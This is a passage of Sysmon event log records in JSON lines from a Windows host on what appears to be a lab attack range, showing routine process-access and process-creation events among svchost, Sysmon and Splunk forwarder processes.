C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:54.569","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6050,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:54.569\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:54.569","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6051,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:54.569\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:54.569","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6052,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:54.569\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-03EA-5F25-0000-001013160B00}\r\nTargetProcessId: 4644\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:54.569","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-03EA-5F25-0000-001013160B00}","TargetProcessId":"4644","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6053,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:54.710\r\nSourceProcessGUID: {A837DB8D-03EA-5F25-0000-001013160B00}\r\nSourceProcessId: 4644\r\nSourceThreadId: 4652\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:54.710","SourceProcessGUID":"{A837DB8D-03EA-5F25-0000-001013160B00}","SourceProcessId":"4644","SourceThreadId":"4652","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6054,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:55.695\r\nProcessGuid: {A837DB8D-03EB-5F25-0000-00105B180B00}\r\nProcessId: 3396\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:55:55.695","ProcessGuid":"{A837DB8D-03EB-5F25-0000-00105B180B00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:55:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6055,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:55.694\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-03EB-5F25-0000-00105B180B00}\r\nTargetProcessId: 3396\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:55.694","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-03EB-5F25-0000-00105B180B00}","TargetProcessId":"3396","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6056,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:55.694\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-03EB-5F25-0000-00105B180B00}\r\nTargetProcessId: 3396\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:55.694","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-03EB-5F25-0000-00105B180B00}","TargetProcessId":"3396","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:55:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6057,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:55.694\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:55.694","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
